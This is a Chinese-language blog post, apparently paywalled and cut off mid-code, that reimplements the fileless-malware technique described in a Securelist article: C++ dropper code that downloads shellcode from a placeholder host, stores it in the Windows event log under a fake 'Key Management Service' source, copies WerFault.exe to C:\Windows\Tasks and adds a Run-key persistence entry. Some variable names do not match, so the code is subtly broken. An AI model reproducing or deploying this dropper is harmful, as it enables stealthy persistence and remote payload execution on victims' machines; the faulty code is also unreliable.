原文章:
https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/
EventShellcodeDropper
核心功能:下载shellcode和wer.dll,并将shellcode写入eventlog
#include <windows.h>
#include <iostream>
#include <objbase.h>
#import "C:\\Windows\\System32\\winhttpcom.dll" no_namespace
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "oleaut32.lib")
const IID IID_IWinHttpRequest =
{
0x06f29373,
0x5c5a,
0x4b54,
{
0xb0, 0x25, 0x6e, 0xf1, 0xbf, 0x8a, 0xbf, 0x0e}
};
BOOL WriteEvents(PBYTE pBuffer,DWORD len) {
HANDLE hEventLog;
hEventLog = RegisterEventSourceW(0,L"Key Management Service");
if (!ReportEventW(hEventLog, EVENTLOG_INFORMATION_TYPE, 0x4142, 9999, 0, 0, len, 0, (LPVOID)pBuffer)) {
CloseEventLog(hEventLog);
return FALSE;
}
CloseEventLog(hEventLog);
return TRUE;
}
VOID DownloadFile(const wchar_t* chUrl,DWORD& dwLen,PBYTE buffer) {
long UpperBounds;
long LowerBounds;
unsigned char* buff;
// Variable for return value.
HRESULT hr;
// Initialize COM.
hr = CoInitialize(NULL);
IWinHttpRequest* pIWinHttpRequest = NULL;
VARIANT varFalse;
VARIANT varEmpty;
VARIANT varResponse;
VariantInit(&varResponse);
CLSID clsid;
VariantInit(&varFalse);
V_VT(&varFalse) = VT_BOOL;
V_BOOL(&varFalse) = VARIANT_FALSE;
VariantInit(&varEmpty);
V_VT(&varEmpty) = VT_ERROR;
hr = CLSIDFromProgID(L"WinHttp.WinHttpRequest.5.1", &clsid);
if (SUCCEEDED(hr))
{
hr = CoCreateInstance(clsid, NULL,
CLSCTX_INPROC_SERVER,
IID_IWinHttpRequest,
(void**)&pIWinHttpRequest);
}
// ==== Get binary (.gif) file and write it to disk. =========
if (SUCCEEDED(hr))
{
// Open WinHttpRequest for synchronous access.
BSTR bstrMethod = SysAllocString(L"GET");
BSTR bstrUrl = SysAllocString(url);
hr = pIWinHttpRequest->Open(bstrMethod, bstrUrl, varFalse);
SysFreeString(bstrMethod);
SysFreeString(bstrUrl);
}
if (SUCCEEDED(hr))
{
// Send Request.
hr = pIWinHttpRequest->Send(varEmpty);
}
if (SUCCEEDED(hr))
{
// Get response body.
hr = pIWinHttpRequest->get_ResponseBody(&varResponse);
}
if (SUCCEEDED(hr))
{
if (varResponse.vt == (VT_ARRAY | VT_UI1)) {
long Dims = SafeArrayGetDim(varResponse.parray);
// The array should only have 1 dimension.
if (Dims == 1) {
// Get upper and lower array bounds.
SafeArrayGetLBound(varResponse.parray, 1,
&LowerBounds);
SafeArrayGetUBound(varResponse.parray, 1,
&UpperBounds);
UpperBounds++;
// Lock SAFEARRAY for access.
SafeArrayAccessData(varResponse.parray,
(void**)&buff);
//拷贝下载的文件到buffer
memcpy(buffer, buff, (UpperBounds - LowerBounds));
SafeArrayUnaccessData(varResponse.parray);
}
}
}
//获取下载的文件的长度
dwLen = UpperBounds - LowerBounds;
// Release memory.
if (pIWinHttpRequest)
pIWinHttpRequest->Release();
CoUninitialize();
}
int main() {
//拷贝文件
CopyFileW(L"C:\\Windows\\system32\\WerFault.exe", L"C:\\Windows\\Tasks\\WerFault.exe", 0);
//权限维持
HKEY hResult;
RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &result);
RegSetValueExW(hResult, L"Windows Problem Reporting", 0, 1, (const BYTE*)L"C:\\Windows\\Tasks\\WerFault.exe", 0x3c);
RegCloseKey(hResult);
//写shellcode到事件
DWORD dwCodeSize;
PBYTE pShellcodeBytes = (PBYTE)malloc(0x10000);
DownloadFile(L"http://x.x.x.x/test.bin", dwCodeSize, pShellcodeBytes);
if(!WriteEvents(pShellcodeBytes, dwCodeSize)) {
return -1;
}
// Create file.
HANDLE hFile;
DWORD dwBytesWritten;
hFile = CreateFile(TEXT("C:\\Windows\\Tasks\\wer.dll"),
GENERIC_WRITE, // Open for writing.
0, // Do not share.
NULL, // No security.
CREATE_ALWAYS, // Overwrite existing.
FILE_ATTRIBUTE_NORMAL, // Normal file.
NULL); // No attribute template.
if (hFile == INVALID_HANDLE_VALUE)
{
return -1;
}
else
{
DWORD dwFileSize;
PBYTE pFileBytes = 
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
